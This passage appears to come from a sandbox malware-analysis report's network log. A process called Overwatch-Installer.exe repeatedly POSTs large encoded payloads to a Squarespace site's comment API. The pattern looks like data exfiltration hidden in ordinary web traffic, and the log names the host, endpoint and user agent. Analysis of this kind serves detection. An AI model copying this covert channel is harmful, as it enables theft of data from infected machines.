2024-09-01 20:04:36 UTC	16306	OUT	Data Raw: 76 2f 51 2f 50 48 38 43 65 75 76 69 59 43 53 68 43 39 32 63 54 49 4c 25 32 42 33 62 44 6a 35 79 6b 77 61 4d 4e 75 2f 41 47 44 65 61 59 46 59 70 64 73 58 53 33 55 32 51 30 63 61 56 4a 71 34 56 7a 70 72 64 39 32 78 61 65 62 25 32 42 41 68 64 56 73 58 6e 71 34 64 2f 44 36 34 25 32 42 7a 38 77 46 72 64 30 61 59 63 74 61 5a 51 52 38 30 43 47 54 34 55 35 6d 44 69 36 58 39 35 38 41 68 66 33 61 49 35 62 76 75 6f 6a 35 61 31 63 71 62 50 45 25 32 42 52 4f 54 34 64 64 6d 6e 6b 49 46 6e 55 36 78 6e 48 73 6b 4d 35 69 72 64 75 38 70 4f 69 49 41 6f 31 46 38 43 66 45 68 74 44 43 78 32 69 53 73 75 73 32 6c 49 43 34 61 7a 56 4b 4e 49 47 50 33 64 43 34 37 6d 6f 4a 36 68 61 72 71 36 41 33 73 6b 57 70 43 43 55 6e 4e 4c 47 46 35 61 42 31 7a 58 74 6c 48 70 48 55 74 69 34 42 64 Data Ascii: v/Q/PH8CeuviYCShC92cTIL%2B3bDj5ykwaMNu/AGDeaYFYpdsXS3U2Q0caVJq4Vzprd92xaeb%2BAhdVsXnq4d/D64%2Bz8wFrd0aYctaZQR80CGT4U5mDi6X958Ahf3aI5bvuoj5a1cqbPE%2BROT4ddmnkIFnU6xnHskM5irdu8pOiIAo1F8CfEhtDCx2iSsus2lIC4azVKNIGP3dC47moJ6harq6A3skWpCCUnNLGF5aB1zXtlHpHUti4Bd
2024-09-01 20:04:36 UTC	1	OUT	Data Raw: 43 Data Ascii: C
2024-09-01 20:04:36 UTC	16306	OUT	Data Raw: 66 61 4c 42 65 71 4d 33 43 67 34 34 56 6a 45 55 4a 4d 47 4d 43 33 45 36 74 46 31 30 75 69 43 34 4d 6f 35 74 78 4f 52 42 6d 32 78 74 49 70 35 4f 6c 66 4c 71 50 58 53 41 74 36 79 76 34 34 71 75 71 46 49 5a 59 68 46 6f 65 73 59 39 56 75 2f 4c 64 49 62 69 53 30 57 44 36 79 6d 33 42 59 74 49 57 2f 4d 47 38 4b 59 46 79 59 75 49 30 46 63 78 48 44 73 69 41 6b 73 66 42 4f 4b 48 77 72 45 25 32 42 71 6a 6c 47 45 79 42 4b 43 4a 52 74 50 74 61 43 36 56 59 64 35 36 61 70 45 61 4d 50 53 46 59 7a 67 67 4f 51 6a 77 68 42 70 36 77 55 30 44 33 4a 6f 46 2f 67 62 37 48 6d 2f 49 50 56 35 72 79 35 50 7a 4b 52 46 44 71 43 64 75 4d 38 78 52 54 48 39 79 6b 34 69 31 65 30 38 46 75 62 6a 71 6e 76 4e 53 58 6e 71 79 47 34 51 4c 69 47 70 33 6a 52 39 5a 6d 63 58 67 32 37 59 47 36 52 7a Data Ascii: faLBeqM3Cg44VjEUJMGMC3E6tF10uiC4Mo5txORBm2xtIp5OlfLqPXSAt6yv44quqFIZYhFoesY9Vu/LdIbiS0WD6ym3BYtIW/MG8KYFyYuI0FcxHDsiAksfBOKHwrE%2BqjlGEyBKCJRtPtaC6VYd56apEaMPSFYzggOQjwhBp6wU0D3JoF/gb7Hm/IPV5ry5PzKRFDqCduM8xRTH9yk4i1e08FubjqnvNSXnqyG4QLiGp3jR9ZmcXg27YG6Rz
2024-09-01 20:04:36 UTC	1	OUT	Data Raw: 72 Data Ascii: r
2024-09-01 20:04:36 UTC	16306	OUT	Data Raw: 47 32 4f 6d 6f 5a 2f 43 67 30 37 61 56 39 43 48 31 44 77 77 41 56 47 41 50 6a 78 48 54 62 32 76 76 42 68 63 63 46 6d 6e 37 7a 4e 6e 43 78 38 6b 49 55 57 62 49 62 67 6a 7a 2f 64 78 67 6f 70 54 58 6c 7a 35 57 38 6f 75 4c 38 25 32 42 78 58 65 63 71 64 36 48 61 49 70 37 4b 75 61 7a 47 5a 57 47 71 6e 78 74 63 30 32 59 6d 6b 64 37 59 34 36 33 65 71 47 37 39 79 76 52 77 61 55 48 4f 63 45 6a 50 4b 44 54 65 2f 53 78 64 59 6c 51 32 38 73 56 57 46 41 59 55 72 5a 35 4a 53 4e 38 73 62 43 78 4c 31 62 66 51 54 51 6d 74 33 6c 4e 36 25 32 42 44 5a 41 71 78 67 39 2f 6a 6c 53 67 34 78 71 47 71 62 4b 42 33 69 74 59 6d 4d 74 42 71 47 64 66 64 78 72 63 59 53 72 47 61 50 67 6b 66 2f 49 79 7a 67 25 32 42 57 37 41 4b 73 52 42 4d 64 31 30 64 4a 55 77 33 4e 2f 32 6c 6b 57 66 49 44 Data Ascii: G2OmoZ/Cg07aV9CH1DwwAVGAPjxHTb2vvBhccFmn7zNnCx8kIUWbIbgjz/dxgopTXlz5W8ouL8%2BxXecqd6HaIp7KuazGZWGqnxtc02Ymkd7Y463eqG79yvRwaUHOcEjPKDTe/SxdYlQ28sVWFAYUrZ5JSN8sbCxL1bfQTQmt3lN6%2BDZAqxg9/jlSg4xqGqbKB3itYmMtBqGdfdxrcYSrGaPgkf/Iyzg%2BW7AKsRBMd10dJUw3N/2lkWfID
2024-09-01 20:04:36 UTC	1	OUT	Data Raw: 69 Data Ascii: i
2024-09-01 20:04:36 UTC	16306	OUT	Data Raw: 56 77 59 4e 4b 6f 4b 4d 59 68 57 38 47 72 39 62 4c 44 45 77 64 7a 71 38 6b 62 64 63 4c 55 30 4d 6a 71 59 42 77 73 36 49 47 79 6d 6f 78 74 62 75 68 76 7a 65 4f 36 53 72 66 53 2f 79 53 77 25 32 42 4d 55 2f 59 39 31 46 46 31 66 50 70 46 67 76 68 37 37 6a 68 39 62 67 66 4c 43 45 31 43 30 41 4c 4d 64 61 4f 4d 33 41 63 39 4e 46 70 66 46 61 50 4f 4d 48 59 54 42 53 77 38 75 2f 72 74 31 48 32 6f 76 78 56 4d 4f 55 6c 69 2f 33 4b 72 4d 58 43 78 25 32 42 6d 33 39 6f 36 6c 78 51 68 4c 43 25 32 42 64 48 51 55 34 6b 32 41 44 62 4e 77 49 4a 54 58 57 48 42 72 52 37 75 7a 4c 78 4d 51 6e 78 6b 52 79 34 70 67 45 4b 39 63 48 58 58 33 4e 4a 31 6f 6b 41 46 31 35 39 45 43 61 38 63 5a 67 4b 38 4b 4d 74 4f 64 76 31 47 76 65 4f 7a 6d 31 6e 34 6c 4f 4f 68 25 32 42 6b 34 42 45 71 46 Data Ascii: VwYNKoKMYhW8Gr9bLDEwdzq8kbdcLU0MjqYBws6IGymoxtbuhvzeO6SrfS/ySw%2BMU/Y91FF1fPpFgvh77jh9bgfLCE1C0ALMdaOM3Ac9NFpfFaPOMHYTBSw8u/rt1H2ovxVMOUli/3KrMXCx%2Bm39o6lxQhLC%2BdHQU4k2ADbNwIJTXWHBrR7uzLxMQnxkRy4pgEK9cHXX3NJ1okAF159ECa8cZgK8KMtOdv1GveOzm1n4lOOh%2Bk4BEqF
2024-09-01 20:04:36 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:36 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BfnYl4odhFggODdiYzQ1ZTQxYjc1ZjA4NzMwY2EwMzJlZDM0ZTA1; Path=/; Secure Set-Cookie: crumb=BcsxmvsLlqBYMjA3ZWIzZGE4MTE2ZDA0ZTNmMGZlMDY5NGMwNzk2; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: fVH2IP1L/jvduzDFE Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BcsxmvsLlqBYMjA3ZWIzZGE4MTE2ZDA0ZTNmMGZlMDY5NGMwNzk2"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49771	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:36 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108470 Expect: 100-continue
2024-09-01 20:04:36 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:36 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:36 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 69 52 6d 63 75 33 66 75 4a 25 32 42 55 67 78 4c 75 43 62 46 59 6a 30 51 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9iRmcu3fuJ%2BUgxLuCbFYj0QgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7M
2024-09-01 20:04:36 UTC	1	OUT	Data Raw: 6f Data Ascii: o
2024-09-01 20:04:36 UTC	16306	OUT	Data Raw: 78 35 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 Data Ascii: x5%2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BC
2024-09-01 20:04:36 UTC	1	OUT	Data Raw: 75 Data Ascii: u
2024-09-01 20:04:36 UTC	16306	OUT	Data Raw: 56 37 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 Data Ascii: V7HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMts
2024-09-01 20:04:36 UTC	1	OUT	Data Raw: 5a Data Ascii: Z
2024-09-01 20:04:36 UTC	16306	OUT	Data Raw: 36 4d 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 Data Ascii: 6MOG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtef
2024-09-01 20:04:36 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:36 UTC	16306	OUT	Data Raw: 42 36 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 Data Ascii: B6ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rW
2024-09-01 20:04:36 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:36 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BfmIHCEvisanOTMwM2JlOWIyYWJhNjI0ODcwMjVjNTY4MGFjYmQ2; Path=/; Secure Set-Cookie: crumb=BVWHvadR058rMTNhOWVlOTk2NjgwYmI1M2RlMDM2OTA2NjY0ODNl; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: itkeOxF6/umRVgeST Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BVWHvadR058rMTNhOWVlOTk2NjgwYmI1M2RlMDM2OTA2NjY0ODNl"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49772	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:37 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 116722 Expect: 100-continue
2024-09-01 20:04:37 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:37 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:37 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 69 52 6d 63 75 33 66 75 4a 25 32 42 57 47 4c 78 69 69 70 6c 49 75 48 51 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9iRmcu3fuJ%2BWGLxiiplIuHQgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7M
2024-09-01 20:04:37 UTC	1	OUT	Data Raw: 71 Data Ascii: q
2024-09-01 20:04:37 UTC	16306	OUT	Data Raw: 38 79 76 2f 51 2f 50 48 38 43 65 75 76 69 59 43 53 68 43 39 32 63 54 49 4c 25 32 42 33 62 44 6a 35 79 6b 77 61 4d 4e 75 2f 41 47 44 65 61 59 46 59 70 64 73 58 53 33 55 32 51 30 63 61 56 4a 71 34 56 7a 70 72 64 39 32 78 61 65 62 25 32 42 41 68 64 56 73 58 6e 71 34 64 2f 44 36 34 25 32 42 7a 38 77 46 72 64 30 61 59 63 74 61 5a 51 52 38 30 43 47 54 34 55 35 6d 44 69 36 58 39 35 38 41 68 66 33 61 49 35 62 76 75 6f 6a 35 61 31 63 71 62 50 45 25 32 42 52 4f 54 34 64 64 6d 6e 6b 49 46 6e 55 36 78 6e 48 73 6b 4d 35 69 72 64 75 38 70 4f 69 49 41 6f 31 46 38 43 66 45 68 74 44 43 78 32 69 53 73 75 73 32 6c 49 43 34 61 7a 56 4b 4e 49 47 50 33 64 43 34 37 6d 6f 4a 36 68 61 72 71 36 41 33 73 6b 57 70 43 43 55 6e 4e 4c 47 46 35 61 42 31 7a 58 74 6c 48 70 48 55 74 69 34 Data Ascii: 8yv/Q/PH8CeuviYCShC92cTIL%2B3bDj5ykwaMNu/AGDeaYFYpdsXS3U2Q0caVJq4Vzprd92xaeb%2BAhdVsXnq4d/D64%2Bz8wFrd0aYctaZQR80CGT4U5mDi6X958Ahf3aI5bvuoj5a1cqbPE%2BROT4ddmnkIFnU6xnHskM5irdu8pOiIAo1F8CfEhtDCx2iSsus2lIC4azVKNIGP3dC47moJ6harq6A3skWpCCUnNLGF5aB1zXtlHpHUti4
2024-09-01 20:04:37 UTC	1	OUT	Data Raw: 46 Data Ascii: F
2024-09-01 20:04:37 UTC	16306	OUT	Data Raw: 42 43 66 61 4c 42 65 71 4d 33 43 67 34 34 56 6a 45 55 4a 4d 47 4d 43 33 45 36 74 46 31 30 75 69 43 34 4d 6f 35 74 78 4f 52 42 6d 32 78 74 49 70 35 4f 6c 66 4c 71 50 58 53 41 74 36 79 76 34 34 71 75 71 46 49 5a 59 68 46 6f 65 73 59 39 56 75 2f 4c 64 49 62 69 53 30 57 44 36 79 6d 33 42 59 74 49 57 2f 4d 47 38 4b 59 46 79 59 75 49 30 46 63 78 48 44 73 69 41 6b 73 66 42 4f 4b 48 77 72 45 25 32 42 71 6a 6c 47 45 79 42 4b 43 4a 52 74 50 74 61 43 36 56 59 64 35 36 61 70 45 61 4d 50 53 46 59 7a 67 67 4f 51 6a 77 68 42 70 36 77 55 30 44 33 4a 6f 46 2f 67 62 37 48 6d 2f 49 50 56 35 72 79 35 50 7a 4b 52 46 44 71 43 64 75 4d 38 78 52 54 48 39 79 6b 34 69 31 65 30 38 46 75 62 6a 71 6e 76 4e 53 58 6e 71 79 47 34 51 4c 69 47 70 33 6a 52 39 5a 6d 63 58 67 32 37 59 47 36 Data Ascii: BCfaLBeqM3Cg44VjEUJMGMC3E6tF10uiC4Mo5txORBm2xtIp5OlfLqPXSAt6yv44quqFIZYhFoesY9Vu/LdIbiS0WD6ym3BYtIW/MG8KYFyYuI0FcxHDsiAksfBOKHwrE%2BqjlGEyBKCJRtPtaC6VYd56apEaMPSFYzggOQjwhBp6wU0D3JoF/gb7Hm/IPV5ry5PzKRFDqCduM8xRTH9yk4i1e08FubjqnvNSXnqyG4QLiGp3jR9ZmcXg27YG6
2024-09-01 20:04:37 UTC	1	OUT	Data Raw: 6d Data Ascii: m
2024-09-01 20:04:37 UTC	16306	OUT	Data Raw: 6f 72 47 32 4f 6d 6f 5a 2f 43 67 30 37 61 56 39 43 48 31 44 77 77 41 56 47 41 50 6a 78 48 54 62 32 76 76 42 68 63 63 46 6d 6e 37 7a 4e 6e 43 78 38 6b 49 55 57 62 49 62 67 6a 7a 2f 64 78 67 6f 70 54 58 6c 7a 35 57 38 6f 75 4c 38 25 32 42 78 58 65 63 71 64 36 48 61 49 70 37 4b 75 61 7a 47 5a 57 47 71 6e 78 74 63 30 32 59 6d 6b 64 37 59 34 36 33 65 71 47 37 39 79 76 52 77 61 55 48 4f 63 45 6a 50 4b 44 54 65 2f 53 78 64 59 6c 51 32 38 73 56 57 46 41 59 55 72 5a 35 4a 53 4e 38 73 62 43 78 4c 31 62 66 51 54 51 6d 74 33 6c 4e 36 25 32 42 44 5a 41 71 78 67 39 2f 6a 6c 53 67 34 78 71 47 71 62 4b 42 33 69 74 59 6d 4d 74 42 71 47 64 66 64 78 72 63 59 53 72 47 61 50 67 6b 66 2f 49 79 7a 67 25 32 42 57 37 41 4b 73 52 42 4d 64 31 30 64 4a 55 77 33 4e 2f 32 6c 6b 57 66 Data Ascii: orG2OmoZ/Cg07aV9CH1DwwAVGAPjxHTb2vvBhccFmn7zNnCx8kIUWbIbgjz/dxgopTXlz5W8ouL8%2BxXecqd6HaIp7KuazGZWGqnxtc02Ymkd7Y463eqG79yvRwaUHOcEjPKDTe/SxdYlQ28sVWFAYUrZ5JSN8sbCxL1bfQTQmt3lN6%2BDZAqxg9/jlSg4xqGqbKB3itYmMtBqGdfdxrcYSrGaPgkf/Iyzg%2BW7AKsRBMd10dJUw3N/2lkWf
2024-09-01 20:04:37 UTC	1	OUT	Data Raw: 67 Data Ascii: g
2024-09-01 20:04:37 UTC	16306	OUT	Data Raw: 4f 69 56 77 59 4e 4b 6f 4b 4d 59 68 57 38 47 72 39 62 4c 44 45 77 64 7a 71 38 6b 62 64 63 4c 55 30 4d 6a 71 59 42 77 73 36 49 47 79 6d 6f 78 74 62 75 68 76 7a 65 4f 36 53 72 66 53 2f 79 53 77 25 32 42 4d 55 2f 59 39 31 46 46 31 66 50 70 46 67 76 68 37 37 6a 68 39 62 67 66 4c 43 45 31 43 30 41 4c 4d 64 61 4f 4d 33 41 63 39 4e 46 70 66 46 61 50 4f 4d 48 59 54 42 53 77 38 75 2f 72 74 31 48 32 6f 76 78 56 4d 4f 55 6c 69 2f 33 4b 72 4d 58 43 78 25 32 42 6d 33 39 6f 36 6c 78 51 68 4c 43 25 32 42 64 48 51 55 34 6b 32 41 44 62 4e 77 49 4a 54 58 57 48 42 72 52 37 75 7a 4c 78 4d 51 6e 78 6b 52 79 34 70 67 45 4b 39 63 48 58 58 33 4e 4a 31 6f 6b 41 46 31 35 39 45 43 61 38 63 5a 67 4b 38 4b 4d 74 4f 64 76 31 47 76 65 4f 7a 6d 31 6e 34 6c 4f 4f 68 25 32 42 6b 34 42 45 Data Ascii: OiVwYNKoKMYhW8Gr9bLDEwdzq8kbdcLU0MjqYBws6IGymoxtbuhvzeO6SrfS/ySw%2BMU/Y91FF1fPpFgvh77jh9bgfLCE1C0ALMdaOM3Ac9NFpfFaPOMHYTBSw8u/rt1H2ovxVMOUli/3KrMXCx%2Bm39o6lxQhLC%2BdHQU4k2ADbNwIJTXWHBrR7uzLxMQnxkRy4pgEK9cHXX3NJ1okAF159ECa8cZgK8KMtOdv1GveOzm1n4lOOh%2Bk4BE
2024-09-01 20:04:37 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:37 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BcyOJYOIi2vyMWMyYjhiOTU5Y2Q3ZjQ2ZmQ0YzEyZTFkMzdlOTQ2; Path=/; Secure Set-Cookie: crumb=BU5XnbBLd9nvMTM1ZmRkZTVlZDMyMWFkNTYzNGI1YTliNmY1OTdi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: uQh84grH/jZ2rqUzh Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BU5XnbBLd9nvMTM1ZmRkZTVlZDMyMWFkNTYzNGI1YTliNmY1OTdi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	49773	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:37 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:37 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:37 UTC	1	OUT	Data Raw: 70 Data Ascii: p
